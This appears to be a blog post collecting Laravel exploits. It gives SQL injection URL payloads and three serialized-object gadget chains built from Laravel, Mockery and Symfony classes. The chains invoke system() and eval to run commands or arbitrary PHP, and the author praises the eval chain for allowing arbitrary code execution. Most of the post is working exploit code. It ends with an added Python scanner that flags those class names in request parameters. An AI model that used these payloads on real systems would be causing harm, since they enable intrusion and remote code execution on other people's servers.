Laravel Vulnerability Collection

SQL injection vulnerability in Laravel

PoC:

/test?email=1&id=1 union select user()#

/test?email=1/`&id=1&column=/ union select user()--+-

You can see that the injection succeeds.

Laravel deserialization vulnerability

1. PoC:

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    class QueuedCommand
    {
        public $connection="dir";
    }
}
namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver="system";

    }
}
namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

The command output is echoed back in the response.

2. PoC:

<?php
namespace Illuminate\Broadcasting{

    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;

    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{

    use Mockery\Generator\MockDefinition;

    class QueuedCommand
    {
        public $connection;
        public function __construct(){
            $this->connection=new MockDefinition();
        }
    }
}
namespace Illuminate\Bus{

    use Mockery\Loader\EvalLoader;

    class Dispatcher
    {
        protected $queueResolver;
        public function __construct(){
            $this->queueResolver=[new EvalLoader(),'load'];
        }
    }
}
namespace Mockery\Loader{
    class EvalLoader
    {

    }
}
namespace Mockery\Generator{
    class MockDefinition
    {
        protected $config;
        protected $code;
        public function __construct()
        {
            $this->code="<?php phpinfo();exit()?>";
            $this->config=new MockConfiguration();
        }
    }
    class MockConfiguration
    {
        protected $name="feng";
    }
}

namespace{

    use Illuminate\Broadcasting\PendingBroadcast;

    echo urlencode(serialize(new PendingBroadcast()));
}

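This PoC is even nicer because it goes through eval, so it can execute arbitrary code and is no longer limited to functions that take a single argument. Also note this line: $this->code="<?php phpinfo();exit()?>";
Adding exit() ends the process early, so the code after the call_user_func call never runs and no exception is thrown, which is even better.

3. PoC: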

<?php
namespace Symfony\Component\Cache\Adapter{

    use Symfony\Component\Cache\CacheItem;

    class TagAwareAdapter
    {
        private $deferred;
        public function __construct(){
            $this->pool=new ProxyAdapter();
            $this->deferred=array(
                'feng'=>new CacheItem()
            );
        }
    }
}
namespace Symfony\Component\Cache{
    final class CacheItem{
        protected $poolHash="1";
        protected $innerItem="dir";
    }
}
namespace Symfony\Component\Cache\Adapter{
    class ProxyAdapter
    {
        private $poolHash="1";
        private $setInnerItem="system";
    }
}
namespace{

    use Symfony\Component\Cache\Adapter\TagAwareAdapter;

    echo urlencode(serialize(new TagAwareAdapter()));
}

Execution succeeds.
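A detection-side counterpart to the three PoCs above (an added example, not code from the original post): each PoC prints `urlencode(serialize(...))`, so the payload arrives as a percent-encoded PHP object string whose `O:<length>:"<class>"` tokens name the classes in the chain. The sketch decodes request parameters and flags those class names; the sample URLs, the path and the parameter names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Classes named in the three PoCs on this page.
GADGET_CLASSES = {
    r"Illuminate\Broadcasting\PendingBroadcast",
    r"Illuminate\Bus\Dispatcher",
    r"Illuminate\Foundation\Console\QueuedCommand",
    r"Mockery\Loader\EvalLoader",
    r"Mockery\Generator\MockDefinition",
    r"Symfony\Component\Cache\Adapter\TagAwareAdapter",
    r"Symfony\Component\Cache\Adapter\ProxyAdapter",
    r"Symfony\Component\Cache\CacheItem",
}

# serialize() writes an object as O:<name length>:"<class>":<property count>:{
OBJECT_TOKEN = re.compile(r'O:(\d+):"([A-Za-z0-9_\\]+)":\d+:\{')

def serialized_classes(value):
    """Class names from object tokens whose declared length matches the name."""
    return [name for length, name in OBJECT_TOKEN.findall(value)
            if int(length) == len(name)]

def scan_request(url):
    """Sorted (parameter, class) pairs for listed classes found in a request URL."""
    findings = set()
    # parse_qsl percent-decodes each value, reversing the PoCs' urlencode() step.
    for param, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for name in serialized_classes(value):
            if name in GADGET_CLASSES:
                findings.add((param, name))
    return sorted(findings)

def php_object(cls, body=""):
    """Build a constructed sample object token (at most one property)."""
    return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, 1 if body else 0, body)

# Constructed sample requests; path and parameter names are hypothetical.
NESTED = 's:1:"e";' + php_object(r"Illuminate\Bus\Dispatcher")
SAMPLE_URLS = [
    "/index?id=42",
    "/index?data=" + quote(php_object(r"Illuminate\Broadcasting\PendingBroadcast", NESTED)),
    "/index?c=" + quote(php_object(r"App\Models\User")),
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url[:24], scan_request(url))
```

A match is a triage signal rather than proof of compromise. The durable fix is to keep request data out of `unserialize()`, or to call it with `['allowed_classes' => false]` so no listed class is ever instantiated.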
